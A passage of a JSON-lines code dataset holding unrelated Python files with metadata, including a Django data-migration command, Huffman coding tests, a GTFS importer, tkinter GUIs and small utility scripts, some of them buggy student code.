currency=currency_name,\n agent_id=user_agent_id,\n recipient_id=user_id,\n amt=amount,\n reason=reason,\n )\n\n\nGame._add_rule_property('allow_abstain_vote', False)\nGame._add_rule_property('allow_change_vote', False)\nGame._add_rule_property('allow_multi_vote', False)\nGame._add_rule_property('proposal_count', 0)\nGame._add_rule_property('proposals', {})\nGame._add_rule_property('proposal_channel', None,\n getter_func=Game._try_get_channel,\n setter_func=lambda self, channel: channel.id)\nGame._add_rule_property('transaction_messages', [])\nGame._add_rule_property('transaction_channel', None,\n getter_func=Game._try_get_channel,\n setter_func=lambda self, channel: channel.id)\nGame._add_rule_property('currencies', {})\nGame._add_rule_property('player_last_seen', {})\nGame._add_rule_property('active_cutoff', 24 * 7)\n","sub_path":"nomic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439994158","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/foundation/log.py\n# Compiled at: 2012-10-12 07:02:39\nimport logging, sys\nLEVELS = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, \n 'WARNING': logging.WARNING, \n 'ERROR': logging.ERROR, \n 'CRITICAL': logging.CRITICAL}\n\ndef getLogger(object):\n if isinstance(object, basestring):\n name = object\n if '/myapp/' in name:\n name = 'myapp/' + name.split('/myapp/')[1]\n name = name.replace('/', '.')\n elif type(object) is types.InstanceType:\n name = str(object.__class__)\n else:\n name = object.__class__.__module__ + '.' + object.__class__.__name__\n return logging.getLogger(name)","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246383959","text":"utah2014 = {\n 'year' : '2014',\n 'page_split_string' : 'Statement of Votes Cast',\n 'race_name_index' : 5,\n 'static_col_count' : 3, #reg. voters, total votes, times counted\n 'tworace_per_page_ranges' : [range(43,133)],\n 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 133,\n 'tworace_title_col_count' : {\n 'STATE SENATE D11' : 2,\n 'STATE SENATE D15' : 2,\n 'STATE REP D2' : 2,\n 'STATE REP D6' : 2,\n 'STATE REP D27' : 2,\n 'STATE REP D48' : 1,\n 'STATE REP D56' : 1,\n 'STATE REP D57' : 2,\n 'STATE REP D59' : 1,\n 'STATE REP D60' : 2,\n 'STATE REP D61' : 2,\n 'STATE REP D63' : 1,\n 'STATE REP D64' : 3,\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 2,\n 'STATE REP D67' : 1,\n 'STATE REP D68' : 1,\n 'COUNTY COMM A' : 2,\n 'COUNTY COMM B' : 2,\n 'ASSESSOR' : 1,\n 'ATTORNEY' : 1,\n 'CLERK/AUDITOR' : 1,\n 'RECORDER' : 1,\n 'SHERIFF' : 2,\n 'SURVEYOR' : 1,\n 'TREASURER' : 1, \n }\n}\n\nutah2010 = {\n 'year' : '2010',\n 'page_split_string' : 'Statement of Votes Cast',\n 'race_name_index' : 6,\n 'static_col_count' : 2, #reg. voters, total votes \n 'tworace_per_page_ranges' : [range(101,106), range(131,141)],\n # 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 145,\n # on top of static cols use these\n 'tworace_title_col_count' : {\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 1,\n 'COUNTY CLERK/AUDITOR' : 1, \n 'COUNTY RECORDER' : 1,\n 'COUNTY SURVEYOR' : 1,\n 'COUNTY SHERIFF' : 1,\n }\n}\n\nconfig = {\n 'year' : '2008',\n 'page_split_string' : 'Official Results',\n 'race_name_index' : 4,\n 'static_col_count' : 2, #reg. voters, total votes \n 'tworace_per_page_ranges' : [range(51,56)],\n # 'ignore_pages' : [22,23,24,25,26,27,28],\n 'end_page' : 140,\n # on top of static cols use these\n 'tworace_title_col_count' : {\n 'STATE REP D65' : 1,\n 'STATE REP D66' : 1,\n 'COUNTY CLERK/AUDITOR' : 1, \n 'COUNTY RECORDER' : 1,\n 'COUNTY SURVEYOR' : 1,\n 'COUNTY SHERIFF' : 1,\n }\n}","sub_path":"pdf_results_notypes/settings_pdf_no_vt.py","file_name":"settings_pdf_no_vt.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566544794","text":"from tkinter import *\nroot = Tk()\nroot.title(\"제목 없음 - Windows 메모장\")\nroot.geometry(\"640x480+300+100\") #가로 *세로 + x좌표 + y좌표\n\nfilename = ''\n\ndef open_file():\n filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Open File\", filetypes=((\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")))\n\ndef save_file(self, whatever = None):\n if (self.filename == ''):\n self.save_file_as()\n else:\n f = open(self.filename, 'w')\n f.write(self.get('1.0', 'end'))\n f.close()\n\ndef open_file():\n global filename\n # filename fileed\n return\nmenu = Menu(root)\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label=\"Open File...\", command=open_file)\nmenu_file.add_command(label=\"Save\", command=self.save_file)\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Exit\", command=root.quit)\nmenu.add_cascade(label=\"File\", menu=menu_file)\n\nscrollbar = Scrollbar()\nscrollbar.pack(side=\"right\", fill=\"y\")\n\ntxt = Text(root, width=640, height=480, yscrollcommand = scrollbar.set)\ntxt.pack()\n\nroot.config(menu=menu)\nroot.mainloop()","sub_path":"gui_basic/15_quiz.py","file_name":"15_quiz.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353773142","text":"from tkinter import *\nfrom tkinter import scrolledtext\nfrom googletrans import Translator\n\ntranslator = Translator(service_urls=[\n 'translate.google.com',\n 'translate.google.co.kr',\n ])\n\ndef fix_tags(text):\n text = text.replace(' ', '>')\n return text\n\ndef translate(event=None):\n new_text = fix_tags(translator.translate([txt_original.get(1.0, END)], src=src_lang.get(), dest=dest_lang.get())[0].text)\n txt_translated.delete(1.0, END)\n txt_translated.insert(1.0, new_text)\n\nwindow = Tk()\nwindow.title(\"Content Translate\")\nwindow.geometry('600x500')\nwindow.bind('', translate)\n\nsrc_lang = StringVar()\ndest_lang =StringVar()\n\nsrc_ru = Radiobutton(text=\"RU\", variable=src_lang, value='ru')\nsrc_uk = Radiobutton(text=\"UK\", variable=src_lang, value='uk')\nsrc_en = Radiobutton(text=\"EN\", variable=src_lang, value='en')\nsrc_ru.place(relx=0.01, rely=0)\nsrc_uk.place(relx=0.21, rely=0)\nsrc_en.place(relx=0.41, rely=0)\nsrc_lang.set('ru')\n\ntxt_original = Text(window, width=50, height=12)\ntxt_original.place(relx=0.01, rely=0.05)\ntxt_original.bind('', translate)\n\nbtn = Button(window, text=\"translate\", bg = 'grey', fg ='white', command=translate)\nbtn.place(relx=0.8, rely=0.05)\n\ndest_ru = Radiobutton(text=\"RU\", variable=dest_lang, value='ru')\ndest_uk = Radiobutton(text=\"UK\", variable=dest_lang, value='uk')\ndest_en = Radiobutton(text=\"EN\", variable=dest_lang, value='en')\ndest_ru.place(relx=0.01, rely=0.45)\ndest_uk.place(relx=0.21, rely=0.45)\ndest_en.place(relx=0.41, rely=0.45)\ndest_lang.set('uk')\n\ntxt_translated = Text(window, width=50, height=12)\ntxt_translated.place(relx=0.01, rely=0.5)\n\nwindow.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"638588210","text":"import gc\nimport importlib\nimport sys\n\nimport ipdb\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom modularodm import Q as MQ\nfrom osf_models.models import ApiOAuth2Scope\nfrom osf_models.models import Guid\nfrom osf_models.models import NodeLog\nfrom osf_models.models import NotificationSubscription\nfrom osf_models.models import Tag\nfrom osf_models.models.base import GuidMixin\nfrom osf_models.models.contributor import AbstractBaseContributor\nfrom osf_models.utils.order_apps import get_ordered_models\n\nfrom framework.auth.core import User as MODMUser\nfrom framework.transactions.context import transaction as modm_transaction\nfrom website.files.models import StoredFileNode\nfrom website.models import Node as MODMNode\n\n\ndef make_guids(django_model, page_size=20000):\n print('Starting {} on {}...'.format(sys._getframe().f_code.co_name, django_model._meta.model.__name__))\n\n module_path, model_name = django_model.modm_model_path.rsplit('.', 1)\n modm_module = importlib.import_module(module_path)\n modm_model = getattr(modm_module, model_name)\n\n count = 0\n total = modm_model.find(django_model.modm_query).count()\n\n while count < total:\n with transaction.atomic():\n django_objects = list()\n offset = count\n limit = (count + page_size) if (count + page_size) < total else total\n\n page_of_modm_objects = modm_model.find(django_model.modm_query).sort('-_id')[offset:limit]\n\n for modm_obj in page_of_modm_objects:\n django_objects.append(Guid(**{django_model.primary_identifier_name: modm_obj._id}))\n count += 1\n if count % page_size == 0 or count == total:\n page_finish_time = timezone.now()\n print('Saving Guids for {} {} through {}...'.format(django_model._meta.model.__name__,\n count - page_size,\n count))\n saved = Guid.objects.bulk_create(django_objects)\n print('Done with {} {} in {} seconds...'.format(len(saved),\n django_model._meta.model.__name__, (\n timezone.now() - page_finish_time).total_seconds()))\n modm_obj._cache.clear()\n modm_obj._object_cache.clear()\n django_objects = []\n print('Took out {} trashes'.format(gc.collect()))\n total = None\n count = None\n print('Took out {} trashes'.format(gc.collect()))\n\n\ndef save_bare_models(modm_queryset, django_model, page_size=20000):\n print('Starting {} on {}...'.format(sys._getframe().f_code.co_name, django_model._meta.model.__name__))\n count = 0\n total = modm_queryset.count()\n hashes = set()\n\n while count < total:\n with transaction.atomic():\n django_objects = list()\n\n offset = count\n limit = (count + page_size) if (count + page_size) < total else total\n\n page_of_modm_objects = modm_queryset.sort('-_id')[offset:limit]\n\n for modm_obj in page_of_modm_objects:\n django_instance = django_model.migrate_from_modm(modm_obj)\n if django_instance._natural_key() is not None:\n # if there's a natural key\n if django_instance._natural_key() not in hashes:\n # and that natural key doesn't exist in hashes\n # add it to hashes and append the object\n hashes.add(django_instance._natural_key())\n django_objects.append(django_instance)\n else:\n # if _natural_key is None add it, it's probably pointing at .pk\n django_objects.append(django_instance)\n\n count += 1\n if count % page_size == 0 or count == total:\n page_finish_time = timezone.now()\n print('Saving {} {} through {}...'.format(django_model._meta.model.__name__, count - page_size,\n count))\n saved_django_objects = django_model.objects.bulk_create(django_objects)\n\n print('Done with {} {} in {} seconds...'.format(len(saved_django_objects),\n django_model._meta.model.__name__, (\n timezone.now() - page_finish_time).total_seconds()))\n modm_obj._cache.clear()\n modm_obj._object_cache.clear()\n saved_django_objects = []\n page_of_modm_objects = []\n print('Took out {} trashes'.format(gc.collect()))\n total = None\n count = None\n hashes = None\n print('Took out {} trashes'.format(gc.collect()))\n\n\ndef save_bare_system_tags(page_size=10000):\n print('Starting save_bare_system_tags...')\n start = timezone.now()\n\n things = list(MODMNode.find(MQ('system_tags', 'ne', [])).sort(\n '-_id')) + list(MODMUser.find(MQ('system_tags', 'ne', [])).sort(\n '-_id'))\n\n system_tag_ids = []\n for thing in things:\n for system_tag in thing.system_tags:\n system_tag_ids.append(system_tag)\n\n unique_system_tag_ids = set(system_tag_ids)\n\n total = len(unique_system_tag_ids)\n\n system_tags = []\n for system_tag_id in unique_system_tag_ids:\n system_tags.append(Tag(name=system_tag_id,\n system=True))\n\n created_system_tags = Tag.objects.bulk_create(system_tags)\n\n print('MODM System Tags: {}'.format(total))\n print('django system tags: {}'.format(Tag.objects.filter(system=True).count()))\n print('Done with {} in {} seconds...'.format(\n sys._getframe().f_code.co_name,\n (timezone.now() - start).total_seconds()))\n\n\ndef register_nonexistent_models_with_modm():\n \"\"\"\n There are guids refering to models that no longer exist.\n We can't delete the guids because then they could be regenerated.\n These models are registered so that anything at all will work.\n :return:\n \"\"\"\n\n class DropboxFile(StoredFileNode):\n pass\n\n class OSFStorageGuidFile(StoredFileNode):\n pass\n\n class OSFGuidFile(StoredFileNode):\n pass\n\n class GithubGuidFile(StoredFileNode):\n pass\n\n class NodeFile(StoredFileNode):\n pass\n\n class BoxFile(StoredFileNode):\n pass\n\n class FigShareGuidFile(StoredFileNode):\n pass\n\n class S3GuidFile(StoredFileNode):\n pass\n\n class DataverseFile(StoredFileNode):\n pass\n\n DataverseFile.register_collection()\n NodeFile.register_collection()\n S3GuidFile.register_collection()\n FigShareGuidFile.register_collection()\n BoxFile.register_collection()\n GithubGuidFile.register_collection()\n OSFStorageGuidFile.register_collection()\n OSFGuidFile.register_collection()\n DropboxFile.register_collection()\n\n@modm_transaction()\ndef merge_duplicate_users():\n print('Starting {}...'.format(sys._getframe().f_code.co_name))\n start = timezone.now()\n\n from framework.mongo.handlers import database\n\n duplicates = database.user.aggregate([\n {\n \"$group\": {\n \"_id\": \"$username\",\n \"ids\": {\"$addToSet\": \"$_id\"},\n \"count\": {\"$sum\": 1}\n }\n },\n {\n \"$match\": {\n \"count\": {\"$gt\": 1}\n }\n },\n {\n \"$sort\": {\n \"count\": -1\n }\n }\n ]).get('result')\n # [\n # {\n # 'count': 5,\n # '_id': 'duplicated@username.com',\n # 'ids': [\n # 'listo','fidst','hatma','tchth','euser','name!'\n # ]\n # }\n # ]\n print('Found {} duplicate usernames.'.format(len(duplicates)))\n for duplicate in duplicates:\n print('Found {} copies of {}'.format(len(duplicate.get('ids')), duplicate.get('_id')))\n if duplicate.get('_id'):\n # _id is an email address, merge users keeping the one that was logged into last\n users = list(MODMUser.find(MQ('_id', 'in', duplicate.get('ids'))).sort('-last_login'))\n best_match = users.pop()\n for user in users:\n print('Merging user {} into user {}'.format(user._id, best_match._id))\n best_match.merge_user(user)\n else:\n # _id is null, set all usernames to their guid\n users = MODMUser.find(MQ('_id', 'in', duplicate.get('ids')))\n for user in users:\n print('Setting username for {}'.format(user._id))\n user.username = user._id\n user.save()\n print('Done with {} in {} seconds...'.format(\n sys._getframe().f_code.co_name,\n (timezone.now() - start).total_seconds()))\n\n\nclass Command(BaseCommand):\n help = 'Migrates data from tokumx to postgres'\n\n def add_arguments(self, parser):\n parser.add_argument('--nodelogs', action='store_true', help='Run nodelog migrations')\n parser.add_argument('--nodelogsguids', action='store_true', help='Run nodelog guid migrations')\n\n\n def handle(self, *args, **options):\n # TODO Handle contributors, they're not a direct 1-to-1 they'll need some love\n\n # it's either this or catch the exception and put them in the blacklistguid table\n register_nonexistent_models_with_modm()\n\n models = get_ordered_models()\n # guids first, pls\n models.insert(0, models.pop(models.index(Guid)))\n\n if not options['nodelogs'] and not options['nodelogsguids']:\n merge_duplicate_users()\n # merged users get blank usernames, running it twice fixes it.\n merge_duplicate_users()\n\n for django_model in models:\n\n if not options['nodelogs'] and not options['nodelogsguids'] and django_model is NodeLog:\n continue\n elif (options['nodelogs'] or options['nodelogsguids']) and django_model is not NodeLog:\n continue\n\n if issubclass(django_model, AbstractBaseContributor) \\\n or django_model is ApiOAuth2Scope \\\n or not hasattr(django_model, 'modm_model_path'):\n continue\n\n module_path, model_name = django_model.modm_model_path.rsplit('.', 1)\n modm_module = importlib.import_module(module_path)\n modm_model = getattr(modm_module, model_name)\n modm_queryset = modm_model.find(django_model.modm_query)\n\n with ipdb.launch_ipdb_on_exception():\n if hasattr(django_model, 'primary_identifier_name') and \\\n not issubclass(django_model, GuidMixin) and \\\n django_model is not NotificationSubscription:\n if not options['nodelogs']:\n make_guids(django_model, page_size=django_model.migration_page_size)\n if not options['nodelogsguids']:\n save_bare_models(modm_queryset, django_model, page_size=django_model.migration_page_size)\n modm_model._cache.clear()\n modm_model._object_cache.clear()\n print('Took out {} trashes'.format(gc.collect()))\n\n # Handle system tags, they're on nodes, they need a special migration\n if not options['nodelogs'] and not options['nodelogsguids']:\n save_bare_system_tags()\n","sub_path":"osf_models/management/commands/migratedata.py","file_name":"migratedata.py","file_ext":"py","file_size_in_byte":11750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351479302","text":"import unittest\nimport filecmp\nfrom huffman_coding import cnt_freq, create_huff_tree, create_code, huffman_encode\nfrom huffman import HuffmanNode\n\nclass TestList(unittest.TestCase):\n\n def test_huffnode_eq_repr(self):\n huff1 = HuffmanNode('c', 5, None, None)\n huff2 = HuffmanNode('d', 5, None, None)\n self.assertNotEqual(huff1, huff2)\n huff2.char = 'c'\n self.assertEqual(huff1, huff2)\n self.assertEqual(repr(huff1), \"HuffmanNode(c, 5, None, None)\")\n\n def test_cnt_freq(self):\n freqlist\t= cnt_freq(\"file1.txt\")\n anslist = [0]*256\n anslist[97:104] = [2, 4, 8, 16, 0, 2, 0]\n self.assertListEqual(freqlist[97:104], anslist[97:104])\n\n def test_create_huff_tree(self):\n freqlist = cnt_freq(\"file1.txt\")\n hufftree = create_huff_tree(freqlist)\n numchars = 32\n charforroot = \"a\"\n self.assertEqual(hufftree.freq, 33)\n self.assertEqual(hufftree.left.char, 'd')\n left = hufftree.left\n self.assertEqual(left.freq, 16)\n self.assertEqual(left.char, 'd')\n right = hufftree.right\n self.assertEqual(right.freq, 17)\n self.assertEqual(ord(right.char), 0)\n\n def test_create_code(self):\n freqlist = cnt_freq(\"file1.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('d', codes[ord('d')])\n print('a', codes[ord('a')])\n print('f', codes[ord('f')])\n self.assertEqual(codes[ord('d')], '0')\n self.assertEqual(codes[ord('a')], '11111')\n self.assertEqual(codes[ord('f')], '1110')\n\n def test_create_code2(self):\n freqlist = cnt_freq(\"file2.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('g', codes[ord('g')])\n print('o', codes[ord('o')])\n print(' ', codes[ord(' ')])\n self.assertEqual(codes[ord('g')], '00')\n self.assertEqual(codes[ord('o')], '01')\n self.assertEqual(codes[ord(' ')], '101')\n\n def test_create_code3(self):\n print(\"TEST #3\")\n freqlist = cnt_freq(\"file3.txt\")\n hufftree = create_huff_tree(freqlist)\n codes = create_code(hufftree)\n print('s', codes[ord('s')])\n print('t', codes[ord('t')])\n print('r', codes[ord('r')])\n print('e', codes[ord('e')])\n print('a', codes[ord('a')])\n print('o', codes[ord('o')])\n print('n', codes[ord('n')])\n print(' ', codes[ord(' ')])\n self.assertEqual(codes[ord('s')], '111')\n self.assertEqual(codes[ord('t')], '00')\n self.assertEqual(codes[ord('a')], '010')\n\n def test_empty(self):\n self.assertRaises(FileNotFoundError, huffman_encode,\n \"does_not_exist.txt\", \"dne_encode.txt\")\n huffman_encode(\"empty.txt\", \"empty_encode.txt\")\n self.assertTrue(filecmp.cmp(\"empty_encode.txt\", \"empty.txt\"))\n\n def test_00(self):\n huffman_encode(\"file0.txt\", \"encodetest0.txt\")\n self.assertTrue(filecmp.cmp(\"encodetest0.txt\", \"file0_soln.txt\"))\n\n\n def test_01_encodefile(self):\n huffman_encode(\"file1.txt\", \"encodetest1.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest1.txt\", \"file1_soln.txt\"))\n\n def test_02_encodefile(self):\n huffman_encode(\"file2.txt\", \"encodetest2.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest2.txt\", \"file2_soln.txt\"))\n\n def test_03_encodefile(self):\n huffman_encode(\"file3.txt\", \"encodetest3.txt\")\n # capture errors by running 'filecmp' on your encoded file\n # with a *known* solution file\n self.assertTrue(filecmp.cmp(\"encodetest3.txt\", \"file3_soln.txt\"))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"huffman_coding/huffman_tests_a.py","file_name":"huffman_tests_a.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434919859","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndatas = pd.read_csv('bj_liuhuan_wkt.csv',skiprows = 1,names=['grid','points'])\nn = len(datas)\n#print(datas['grid'])\n\n'''\n# 简单看下网格的样子\nfig = plt.figure(1)\nprint(datas['points'][0])\nfor i in range(len(datas)):\n data = datas['points'][i]\n # print(data)\n xs = []\n ys = []\n loc = data.find('(')\n xs.append(int(data[loc + 3:loc + 9]))\n ys.append(int(data[loc + 22:loc + 29]))\n data = data[loc + 42:]\n for i in range(3):\n xs.append(int(data[:6]))\n ys.append(int(data[19:26]))\n data = data[39:]\n\n plt.scatter(xs, ys,marker='.',s=2)\nplt.show(fig)\n'''\n\n# 发现坐标更简单的规律,(433943.69714851433 4393540.4441694766),且只找一个网格的左上角\nxs=[]; ys=[]\nfor i in range(len(datas)):\n data = datas['points'][i] #Dataframe读取先列后行\n # print(data)\n loc = data.find('(')\n xs.append(int(data[loc + 4:loc + 6]))\n ys.append(int(data[loc + 23:loc + 26]))\nxs=pd.Series(xs); ys=pd.Series(ys)\nxs = xs-xs.min()\nys = ys-ys.min()\n\nfig = plt.figure(1)\nplt.scatter(xs,ys,marker='.',s=3)\nplt.show(fig)\n\n'''\n# 找到编号对应的一个二维矩阵中的位置,即行列数值\nxordi = xs.max()+1 #列数\nyordi = ys.max()+1 #行数\ngrid2loc = pd.DataFrame(np.zeros((n,2),np.int8),index = datas['grid']) #类似字典形式 编号--坐标\nloc2grid = pd.DataFrame(np.zeros((yordi,xordi),np.int16)) #二维矩阵形式 坐标--编号\nfor i in range(n):\n gridnumber = datas['grid'][i]\n point = (xs[i],ys[i])\n grid2loc.iat[i,0] = xs[i]\n grid2loc.iat[i,1] = ys[i]\n loc2grid.iat[ys[i],xs[i]] = gridnumber\n# 保存成csv格式\ngrid2loc.to_csv('grid2loc.csv',index_label= 'stationID',header=['x_cor','y_cor'])\nloc2grid.to_csv('loc2grid.csv')\n#print(grid2loc)\n#print(loc2grid)\n'''\n\n\n\n\n\n\n","sub_path":"Code/Preprocessor/Grids_processing/gridindex.py","file_name":"gridindex.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"446772141","text":"'''\nCreated on Jan 22, 2012\n\n@author: sanjits\n'''\n\nimport csv\nfrom gtfs.models import Agency\nfrom gtfsimporterutils import csvValueOrNone\nfrom importer_base import CSVImporterBase\n\nclass AgencyImporter(CSVImporterBase):\n '''\n Import the agencies from agency.txt\n '''\n\n def __init__(self, filename, source, logger):\n '''\n Constructor.\n @param filename: file name to import (full path to agency.txt)\n @param source: source of importer\n @param logger: logger\n '''\n super(AgencyImporter, self).__init__()\n self.filename = filename\n self.source = source\n self.logger = logger\n assert self.source is not None\n \n def parse(self):\n '''\n Parse the agency.txt csv file creating an Agency\n record per csv record\n '''\n # Delete existing entries\n agenciesToDelete = Agency.objects.filter(source=self.source)\n self.logger.debug('Cleaning existing Agencies %s', agenciesToDelete)\n agenciesToDelete.delete()\n \n # Iterate over all entries\n reader = csv.DictReader(open(self.filename, 'r'), skipinitialspace=True)\n agency = None\n for row in reader:\n #Parse row\n self.logger.info('Parsing agency row: %s', row)\n agencyId = csvValueOrNone(row, 'agency_id')\n agency = Agency()\n agency.source = self.source\n agency.agencyId = agencyId\n agency.agencyName = row['agency_name']\n agency.agencyUrl= row['agency_url']\n agency.agencyTimezone = row['agency_timezone']\n agency.agencyLang = csvValueOrNone(row, 'agency_lang')\n agency.agencyPhone = csvValueOrNone(row, 'agency_phone')\n agency.agencyFareUrl = csvValueOrNone(row, 'agency_fare_url')\n agency.save()\n \n return agency","sub_path":"agency_importer.py","file_name":"agency_importer.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427578166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport math\nimport landdata\n\ndef parse_LandTaipeiList(landparser):\n FILENAME = \"../OtherDatas/LandTaipeiList-20150529.xlsx\"\n inwb = load_workbook(FILENAME)\n data = {}\n for sheetName in inwb.get_sheet_names():\n sheet = inwb[sheetName]\n print(sheetName, type(sheet), sheet)\n# print(sheet.rows)\n# print(sheet.rows)\n# print(sheet.rows[:2])\n for row in sheet.rows:\n if row[0].value.find('臺北市市有土地清冊') >= 0 or row[0].value.find('管理機關') >= 0:\n continue\n# print(row[0].value)\n rowdata = [ r.value for r in row ]\n pl = landparser.parseland(rowdata[1]+\"地號\")\n# print(rowdata, pl)\n if not pl:\n continue\n if pl[0] in data.keys():\n# print(\"dup:\", data[pl[0]][0], rowdata)\n if data[pl[0]][0][0] == rowdata[0]:\n data[pl[0]][0][3] += rowdata[3]\n else:\n data[pl[0]][2] += 1\n else:\n data[pl[0]] = [rowdata, pl, 0]\n print('---------------------------')\n# break\n# for k, v in data.items():\n# if v[2] != 0:\n# print(v)\n# print('---------------------------')\n noeq = 0\n eq = 0\n insert = []\n for k, v in data.items():\n if v[2] == 0 and v[0][2] >= v[0][3]:\n if v[0][2] != v[0][3]:\n noeq += 1\n# print(v[0][2], v[0][3], ' >> ', int(math.ceil(v[0][2])), int(math.ceil(v[0][3])))\n numerator = int(math.ceil(v[0][3]))\n denominator = int(math.ceil(v[0][2]))\n else:\n eq += 1\n numerator = 1\n denominator = 1\n if numerator > denominator:\n raise 'gg'\n insert.append([4] + v[1] + [v[0][2], numerator, denominator, '臺北市'+v[0][0]])\n print(\"noeq=%d eq=%d\" % (noeq, eq))\n with landdata.LandStorage() as db:\n db.insert_excel_datas_0(insert)\n# for i in insert:\n# print(i)\n\nif __name__ == \"__main__\":\n print('Excel parser!')\n import sys\n sys.path.insert(0, '../')\n import parser\n _LANDNAME_DB_PATH = '../LandName/landnames.sqlite'\n parser = parser.LandParser(_LANDNAME_DB_PATH)\n parse_LandTaipeiList(parser)\n print(\"--END--\")\n\n\n\n\n\n","sub_path":"FNPCrawler/parser_excel.py","file_name":"parser_excel.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"86776760","text":"from rest_framework import serializers\nfrom .models import User\nfrom django.contrib.auth.models import Group\n\nclass UserSerializer(serializers.ModelSerializer):\n\n groups = serializers.SlugRelatedField(\n queryset=Group.objects.all(),\n slug_field=\"name\",\n required=True,\n many=True\n )\n class Meta:\n model = User\n fields = (\"id\", \"username\", \"first_name\", \"last_name\",\"groups\")\n read_only_fields = (\"username\",)\n\n\nclass UserGroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = [\"name\",\"permissions\"]\n\n\n\nclass CreateUserSerializer(serializers.ModelSerializer):\n groups = serializers.SlugRelatedField(\n queryset=Group.objects.all(),\n slug_field=\"name\",\n required=True,\n many=True\n )\n\n\n\n def create(self, validated_data):\n # call create_user on user object. Without this\n # the password will be stored in plain text.\n groups = validated_data.pop(\"groups\", [])\n user = User.objects.create_user(**validated_data)\n if groups:\n user.groups.clear()\n user.groups.add(*groups)\n user.save()\n return user\n\n def update(self, instance, validated_data):\n # call create_user on user object. Without this\n # the password will be stored in plain text.\n groups = validated_data.pop(\"groups\", [])\n\n for name, value in validated_data.items():\n setattr(instance, name, value)\n instance.save()\n\n if groups:\n instance.groups.clear()\n instance.groups.add(*groups)\n instance.save()\n return instance\n\n\n\n\n class Meta:\n model = User\n fields = (\n \"id\",\n \"username\",\n \"password\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"auth_token\",\n \"groups\"\n )\n read_only_fields = (\"auth_token\",)\n extra_kwargs = {\"password\": {\"write_only\": True}}\n\n\n###############################################################################################\n# Elastic Serializer\n###############################################################################################\n\n\nclass UserElasticSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\"id\", \"first_name\", \"last_name\",\"username\")\n read_only_fields = (\"username\",)\n","sub_path":"backend/pkdb_app/users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"10803883","text":"import os\nimport sys\n\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n #\n minutes = s[3:5]\n seconds = s[6:8]\n AMPM = s[8:]\n Inthours = int(s[0:2])\n\n if AMPM == 'AM' and Inthours in range(1, 11):\n Inthours = (\"0\" + str(Inthours))\n elif AMPM == 'AM' and Inthours == 12:\n Inthours = \"00\"\n elif AMPM == 'PM' and Inthours != 12:\n Inthours += 12\n\n hours = str(Inthours)\n militaryTime = (hours + \":\" + minutes + \":\" + seconds)\n return militaryTime","sub_path":"TimeConversion.py","file_name":"TimeConversion.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26977216","text":"def earliest_ancestor(data, id, ancs=None):\n # Create an empty list for ancestors. Each ancestor will itself be a list that begins with the starting id and ends with the ancestor, with each descendent (if any) in between. It is prepopulated with the provided id.\n if ancs == None:\n ancs = [[id]]\n # Find parents of the current id by looking through data for any list that ends with the id. Add any parents to ancs.\n for i in range(len(data)):\n if data[i][1] == id:\n # Create the correct lineage for new ancestor by finding and copying the lineage for that ancestor's child (which is the current id):\n lineage = [list(ancs[j])\n for j in range(len(ancs)) if ancs[j][-1] == id][0]\n lineage.append(data[i][0])\n # Add new ancestor to the front of ancs if it's a new record for longest lineage; 